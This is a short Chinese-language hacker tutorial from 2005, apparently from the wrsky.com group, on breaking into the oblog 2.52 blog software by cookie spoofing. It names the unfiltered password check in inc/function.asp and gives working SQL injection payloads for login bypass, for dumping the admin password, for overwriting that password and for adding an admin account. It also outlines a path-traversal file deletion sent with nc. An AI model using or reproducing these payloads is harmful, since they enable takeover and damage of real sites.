oblog2.52的cookies欺骗入侵
   由于oblog2.52中的inc/function.asp文件中的checkuserlogined()函数对password没有过滤就放到了sql语句执行导致了sql注入，最明显的是a' or 'a'='a漏洞，在function.asp还有两个函数codeCookie()是加密用户名和密码的，decodeCookie()是解密，如果是mssql，可以导致后台更改管理员密码和添加管理员等等。
0dca22a731e30058' and 1<(select userpassword from [user] where userid=1)--暴管理员密码
0dca22a731e30058' update [user] set userpassword='0dca22a731e30058' where username='admin' 修改管理员密码
0dca22a731e30058' inset into admin(username,password) values('9xiao','0dca22a731e30058')-- 加管理员，上面三个语句需要运行codecookie加密后在ieview修改cookies
好久没有做动画嘿嘿，今天有些时间做个最新的oblog2.52的cookies欺骗，把a' or 'a'='a加密，在password中修改，嘿嘿进前台了，这个版本还有一个删除任意文件的漏洞，动画在网上已经出了，偶简单说下，抓包，在文件名那地方利用../来指定你要删除的文件比如../index.asp修改好后用nc提交就可以了，本来演示提权的没有找到mssql版的，就算了。记得来火狐做客啊，2005年8.27号的火狐主办河南省首届网络攻防大赛开始了，欢迎来报名。呵呵·！
再见！
火狐—通往天堂的末班车
http://www.wrsky.com
2005.08.02
by 9xiao